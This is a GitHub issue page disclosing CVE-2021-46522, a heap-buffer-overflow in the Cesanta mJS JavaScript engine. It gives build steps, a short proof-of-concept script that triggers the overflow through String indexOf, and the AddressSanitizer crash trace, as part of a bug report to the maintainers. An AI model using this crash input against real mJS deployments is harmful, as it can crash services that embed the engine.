Headline
CVE-2021-46522: Heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53) · Issue #196 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via /usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
hope-fly opened this issue
Dec 31, 2021
· 0 comments
Comments
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test casepoc.js
function JSEtest(a) {
let arr = ['prototype'.indexOf(JSON.stringify({ foo: [], bar: {} }, ['foo', 'bar', 'myProp']))];
if (a < 10)
JSEtest(a + 1);
}
JSEtest(0);
Execution steps & Output
$ ./mjs/build/mjs poc.js
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b0000000ab at pc 0x7fabea0b7f54 bp 0x7ffdfc32c250 sp 0x7ffdfc32b9f8 READ of size 19 at 0x60b0000000ab thread T0 #0 0x7fabea0b7f53 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53) #1 0x55e0e1aa2ff6 in mg_strstr src/common/mg_str.c:154 #2 0x55e0e1a6c363 in mjs_string_index_of src/mjs_string.c:366 #3 0x55e0e19c5244 in mjs_execute src/mjs_exec.c:853 #4 0x55e0e19cea05 in mjs_exec_internal src/mjs_exec.c:1073 #5 0x55e0e19cea05 in mjs_exec_file src/mjs_exec.c:1096 #6 0x55e0e198b909 in main src/mjs_main.c:47 #7 0x7fabe9a34b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55e0e198c449 in _start (/usr/local/bin/Gmjs+0xe449)
0x60b0000000ab is located 0 bytes to the right of 107-byte region [0x60b000000040,0x60b0000000ab) allocated by thread T0 here: #0 0x7fabea0e6f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55e0e1a9d346 in mbuf_resize src/common/mbuf.c:50
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53) Shadow bytes around the buggy address: 0x0c167fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c167fff8010: 00 00 00 00 00[03]fa fa fa fa fa fa fa fa fd fd 0x0c167fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c167fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb
Credits: Found by OWL337 team.
1 participant